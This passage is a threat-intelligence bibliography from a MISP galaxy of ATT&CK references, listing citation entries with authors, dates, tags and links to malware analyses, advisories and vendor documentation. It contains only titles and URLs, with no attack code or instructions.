https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries

Microsoft ADS Mar 2014

Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="Microsoft ADS Mar 2014"

Table 12560. Table References

Links

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

XPNSec PPID Nov 2017

Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="XPNSec PPID Nov 2017"

Table 12561. Table References

Links

https://blog.xpnsec.com/becoming-system/

Microsoft AlwaysInstallElevated 2018

Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.

The tag is: misp-galaxy:references="Microsoft AlwaysInstallElevated 2018"

Table 12562. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated

Amazon Snapshots

Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon Snapshots"

Table 12563. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html

Amazon AMI

Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon AMI"

Table 12564. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html

Amazon S3

Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon S3"

Table 12565. Table References

Links

https://aws.amazon.com/s3/

Trend Micro S3 Exposed PII, 2017

Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Trend Micro S3 Exposed PII, 2017"

Table 12566. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia

Recorded Future Beacon Certificates

Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Recorded Future Beacon Certificates"

Table 12567. Table References

Links

https://www.recordedfuture.com/cobalt-strike-servers/

Botnet Scan

Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from a Botnet. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Botnet Scan"

Table 12568. Table References

Links

https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Trend Micro Ngrok September 2020

Borja, A., Camba, A. et al. (2020, September 14). Analysis of a Convoluted Attack Chain Involving Ngrok. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="Trend Micro Ngrok September 2020"

Table 12569. Table References

Links

https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html

CIRCL PlugX March 2013

Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="CIRCL PlugX March 2013"

Table 12570. Table References

Links

http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

Apple Unified Log Analysis Remote Login and Screen Sharing

Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Apple Unified Log Analysis Remote Login and Screen Sharing"

Table 12571. Table References

Links

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

Medium S2W WhisperGate January 2022

S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.

The tag is: misp-galaxy:references="Medium S2W WhisperGate January 2022"

Table 12572. Table References

Links

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

Analysis of FG-IR-22-369

Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of FG-IR-22-369. Retrieved May 15, 2023.

The tag is: misp-galaxy:references="Analysis of FG-IR-22-369"

Table 12573. Table References

Links

https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis

Graeber 2014

Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Graeber 2014"

Table 12574. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

Fortinet Agent Tesla April 2018

Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Fortinet Agent Tesla April 2018"

Table 12575. Table References

Links

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

Antiy CERT Ramsay April 2020

Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel’s infiltration and isolation network. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Antiy CERT Ramsay April 2020"

Table 12576. Table References

Links

https://www.programmersought.com/article/62493896999/

Storm-0558 techniques for unauthorized email access

Microsoft Threat Intelligence. (2023, July 14). Analysis of Storm-0558 techniques for unauthorized email access. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Storm-0558 techniques for unauthorized email access"

Table 12577. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

ESET Telebots July 2017

Cherepanov, A. (2017, July 4). Analysis of TeleBots’ cunning backdoor. Retrieved June 11, 2020.

The tag is: misp-galaxy:references="ESET Telebots July 2017"

Table 12578. Table References

Links

https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/

EST Kimsuky SmokeScreen April 2019

ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US. Source: https://blog.alyac.co.kr/2243 [ESTsecurity ALYac Blog]. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="EST Kimsuky SmokeScreen April 2019"

Table 12579. Table References

Links

https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf

Ukraine15 - EISAC - 201603

Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukrainian Power Grid: Defense Use Case. Retrieved March 27, 2018.

The tag is: misp-galaxy:references="Ukraine15 - EISAC - 201603"

Table 12580. Table References

Links

https://nsarchive.gwu.edu/sites/default/files/documents/3891751/SANS-and-Electricity-Information-Sharing-and.pdf

Check Point Havij Analysis

Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="Check Point Havij Analysis"

Table 12581. Table References

Links

https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/

ESET Emotet Dec 2018

Perez, D. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="ESET Emotet Dec 2018"

Table 12582. Table References

Links

https://www.welivesecurity.com/2018/12/28/analysis-latest-emotet-propagation-campaign/

Rewterz Sidewinder COVID-19 June 2020

Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.

The tag is: misp-galaxy:references="Rewterz Sidewinder COVID-19 June 2020"

Table 12583. Table References

Links

https://www.rewterz.com/articles/analysis-on-sidewinder-apt-group-covid-19

CISA AR18-352A Quasar RAT December 2018

CISA. (2018, December 18). Analysis Report (AR18-352A) Quasar Open-Source Remote Administration Tool. Retrieved August 1, 2022.

The tag is: misp-galaxy:references="CISA AR18-352A Quasar RAT December 2018"

Table 12584. Table References

Links

https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-352A

CISA AR21-126A FIVEHANDS May 2021

CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="CISA AR21-126A FIVEHANDS May 2021"

Table 12585. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

JoeSecurity Egregor 2020

Joe Security. (n.d.). Analysis Report fasm.dll. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="JoeSecurity Egregor 2020"

Table 12586. Table References

Links

https://www.joesandbox.com/analysis/318027/0/html

GDATA Zeus Panda June 2017

Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="GDATA Zeus Panda June 2017"

Table 12587. Table References

Links

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

jstnk9.github.io June 01 2022

jstnk9.github.io. (2022, June 1). Analyzing AsyncRAT distributed in Colombia | Welcome to Jstnk webpage. Retrieved May 7, 2023.

The tag is: misp-galaxy:references="jstnk9.github.io June 01 2022"

Table 12588. Table References

Links

https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/

Analyzing CS Dec 2020

Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Analyzing CS Dec 2020"

Table 12589. Table References

Links

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

Uperesia Malicious Office Documents

Felix. (2016, September). Analyzing Malicious Office Documents. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Uperesia Malicious Office Documents"

Table 12590. Table References

Links

https://www.uperesia.com/analyzing-malicious-office-documents

Unit42 OilRig Nov 2018

Falcone, R., Wilhoit, K. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Unit42 OilRig Nov 2018"

Table 12591. Table References

Links

https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/

McAfee GhostSecret

Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="McAfee GhostSecret"

Table 12592. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

Microsoft Analyzing Solorigate Dec 2020

MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers. Retrieved January 5, 2021.

The tag is: misp-galaxy:references="Microsoft Analyzing Solorigate Dec 2020"

Table 12593. Table References

Links

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

Lastline PlugX Analysis

Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.

The tag is: misp-galaxy:references="Lastline PlugX Analysis"

Table 12594. Table References

Links

http://labs.lastline.com/an-analysis-of-plugx

TrendMicro Sandworm October 2014

Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="TrendMicro Sandworm October 2014"

Table 12595. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/

Dragos Crashoverride 2018

Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Dragos Crashoverride 2018"

Table 12596. Table References

Links

https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

Syscall 2014

Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="Syscall 2014"

Table 12597. Table References

Links

https://lwn.net/Articles/604515/

SCADAfence_ransomware

Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.

The tag is: misp-galaxy:references="SCADAfence_ransomware"

Table 12598. Table References

Links

https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf

ESET IIS Malware 2021

Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.

The tag is: misp-galaxy:references="ESET IIS Malware 2021"

Table 12599. Table References

Links

https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf

Medium Anchor DNS July 2020

Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.

The tag is: misp-galaxy:references="Medium Anchor DNS July 2020"

Table 12600. Table References

Links

https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

NSA Joint Advisory SVR SolarWinds April 2021

NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="NSA Joint Advisory SVR SolarWinds April 2021"

Table 12601. Table References

Links

https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF

Kaspersky Andariel Ransomware June 2021

Park, S. (2021, June 15). Andariel evolves to target South Korea with ransomware. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Kaspersky Andariel Ransomware June 2021"

Table 12602. Table References

Links

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

RFC826 ARP

Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="RFC826 ARP"

Table 12603. Table References

Links

https://tools.ietf.org/html/rfc826

HP SVCReady Jun 2022

Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.

The tag is: misp-galaxy:references="HP SVCReady Jun 2022"

Table 12604. Table References

Links

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

SecureList Fileless

Legezo, D. (2022, May 4). A new secret stash for “fileless” malware. Retrieved March 23, 2023.

The tag is: misp-galaxy:references="SecureList Fileless"

Table 12605. Table References

Links

https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

ESET Ebury Feb 2014

M.Léveillé, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="ESET Ebury Feb 2014"

Table 12606. Table References

Links

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Welivesecurity Ebury SSH

M.Léveillé, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Welivesecurity Ebury SSH"

Table 12607. Table References

Links

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Avertium Black Basta June 2022

Avertium. (2022, June 1). AN IN-DEPTH LOOK AT BLACK BASTA RANSOMWARE. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Avertium Black Basta June 2022"

Table 12608. Table References

Links

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

Myers 2007

Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Myers 2007"

Table 12609. Table References

Links

http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf

Linux Services Run Levels

The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Linux Services Run Levels"

Table 12610. Table References

Links

https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/

Anomali Pirate Panda April 2020

Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Anomali Pirate Panda April 2020"

Table 12611. Table References

Links

https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z

AnonGhost Team Profile

ADL. (2015, July 6). AnonGhost Team. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="AnonGhost Team Profile"

Table 12612. Table References

Links

https://www.adl.org/resources/profile/anonghost-team

AnonHBGary

Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="AnonHBGary"

Table 12613. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Fortinet Metamorfo Feb 2020

Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.

The tag is: misp-galaxy:references="Fortinet Metamorfo Feb 2020"

Table 12614. Table References

Links

https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions

MuddyWater TrendMicro June 2018

Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="MuddyWater TrendMicro June 2018"

Table 12615. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/

AlienVault Sykipot 2011

Blasco, J. (2011, December 12). Another Sykipot sample likely targeting US federal agencies. Retrieved March 28, 2016.

The tag is: misp-galaxy:references="AlienVault Sykipot 2011"

Table 12616. Table References

Links

https://www.alienvault.com/open-threat-exchange/blog/another-sykipot-sample-likely-targeting-us-federal-agencies

RiskIQ Newegg September 2018

Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.

The tag is: misp-galaxy:references="RiskIQ Newegg September 2018"

Table 12617. Table References

Links

https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/

Dell WMI Persistence

Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.

The tag is: misp-galaxy:references="Dell WMI Persistence"

Table 12618. Table References

Links

https://www.secureworks.com/blog/wmi-persistence

iDefense Rootkit Overview

Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="iDefense Rootkit Overview"

Table 12619. Table References

Links

http://www.megasecurity.org/papers/Rootkits.pdf

Mandiant Ukraine Cyber Threats January 2022

Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.

The tag is: misp-galaxy:references="Mandiant Ukraine Cyber Threats January 2022"

Table 12620. Table References

Links

https://www.mandiant.com/resources/ukraine-crisis-cyber-threats

Microsoft AMSI

Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft AMSI"

Table 12621. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

Microsoft Anti Spoofing

Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Microsoft Anti Spoofing"

Table 12622. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

Fox-It Anunak Feb 2015

Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.

The tag is: misp-galaxy:references="Fox-It Anunak Feb 2015"

Table 12623. Table References

Links

https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

Group-IB Anunak

Group-IB and Fox-IT. (2014, December). Anunak: APT against financial institutions. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Group-IB Anunak"

Table 12624. Table References

Links

http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf

Google TAG Ukraine Threat Landscape March 2022

Huntley, S. (2022, March 7). An update on the threat landscape. Retrieved March 16, 2022.

The tag is: misp-galaxy:references="Google TAG Ukraine Threat Landscape March 2022"

Table 12625. Table References

Links

https://blog.google/threat-analysis-group/update-threat-landscape-ukraine

Zairon Hooking Dec 2006

Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Zairon Hooking Dec 2006"

Table 12626. Table References

Links

https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/

SentinelOne Aoqin Dragon June 2022

Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="SentinelOne Aoqin Dragon June 2022"

Table 12627. Table References

Links

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Apache Server 2018

Apache. (n.d.). Apache HTTP Server Version 2.4 Documentation - Web Site Content. Retrieved July 27, 2018.

The tag is: misp-galaxy:references="Apache Server 2018"

Table 12628. Table References

Links

http://httpd.apache.org/docs/2.4/getting-started.html#content

Secureworks BRONZEUNION Feb 2019

Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.

The tag is: misp-galaxy:references="Secureworks BRONZEUNION Feb 2019"

Table 12629. Table References

Links

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

AppArmor official

AppArmor. (2017, October 19). AppArmor Security Project Wiki. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="AppArmor official"

Table 12630. Table References

Links

http://wiki.apparmor.net/index.php/Main_Page

Mandiant APT1 Appendix

Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.

The tag is: misp-galaxy:references="Mandiant APT1 Appendix"

Table 12631. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

AppInit Secure Boot

Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.

The tag is: misp-galaxy:references="AppInit Secure Boot"

Table 12632. Table References

Links

https://msdn.microsoft.com/en-us/library/dn280412

AppInstaller.exe - LOLBAS Project

LOLBAS. (2020, December 2). AppInstaller.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AppInstaller.exe - LOLBAS Project"

Table 12633. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

objectivesee osx.shlayer apple approved 2020

Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code …now notarized!? #2020. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="objectivesee osx.shlayer apple approved 2020"

Table 12634. Table References

Links

https://objective-see.com/blog/blog_0x4E.html

AppleDocs AuthorizationExecuteWithPrivileges

Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="AppleDocs AuthorizationExecuteWithPrivileges"

Table 12635. Table References

Links

https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg

AppleDocs Scheduling Timed Jobs

Apple. (n.d.). Retrieved July 17, 2017.

The tag is: misp-galaxy:references="AppleDocs Scheduling Timed Jobs"

Table 12636. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html

CISA AppleJeus Feb 2021

Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.

The tag is: misp-galaxy:references="CISA AppleJeus Feb 2021"

Table 12637. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-048a

Apple Remote Desktop Admin Guide 3.3

Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Apple Remote Desktop Admin Guide 3.3"

Table 12638. Table References

Links

https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf

applescript signing

Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="applescript signing"

Table 12639. Table References

Links

https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/

Corio 2008

Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="Corio 2008"

Table 12640. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

Microsoft Application Lockdown

Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="Microsoft Application Lockdown"

Table 12641. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)?redirectedfrom=MSDN

SANS Application Whitelisting

Beechey, J. (2014, November 18). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="SANS Application Whitelisting"

Table 12642. Table References

Links

https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

Beechey 2010

Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="Beechey 2010"

Table 12643. Table References

Links

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

NSA MS AppLocker

NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="NSA MS AppLocker"

Table 12644. Table References

Links

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Penetration Testing Lab MSXSL July 2017

netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Penetration Testing Lab MSXSL July 2017"

Table 12645. Table References

Links

https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/

Microsoft Requests for Azure AD Roles in Privileged Identity Management

Microsoft. (2023, January 30). Approve or deny requests for Azure AD roles in Privileged Identity Management. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Requests for Azure AD Roles in Privileged Identity Management"

Table 12646. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/azure-ad-pim-approval-workflow

Apple App Security Overview

Apple Inc. (2021, February 18). App security overview. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Apple App Security Overview"

Table 12647. Table References

Links

https://support.apple.com/guide/security/app-security-overview-sec35dd877d0/1/web/1

Tripwire AppUNBlocker

Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Tripwire AppUNBlocker"

Table 12648. Table References

Links

https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Appvlp.exe - LOLBAS Project

LOLBAS. (2018, May 25). Appvlp.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Appvlp.exe - LOLBAS Project"

Table 12649. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/

BlackHat Atkinson Winchester Token Manipulation

Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="BlackHat Atkinson Winchester Token Manipulation"

Table 12650. Table References

Links

https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf

FireEye APT10 April 2017

FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.

The tag is: misp-galaxy:references="FireEye APT10 April 2017"

Table 12651. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

Securelist APT10 March 2021

GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.

The tag is: misp-galaxy:references="Securelist APT10 March 2021"

Table 12652. Table References

Links

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

FireEye APT10 Sept 2018

Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.

The tag is: misp-galaxy:references="FireEye APT10 Sept 2018"

Table 12653. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

NCC Group APT15 Alive and Strong

Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="NCC Group APT15 Alive and Strong"

Table 12654. Table References

Links

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Mandiant APT1

Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.

The tag is: misp-galaxy:references="Mandiant APT1"

Table 12655. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Profero APT27 December 2020

Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Profero APT27 December 2020"

Table 12656. Table References

Links

https://web.archive.org/web/20210104144857/https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf

FireEye APT28 January 2017

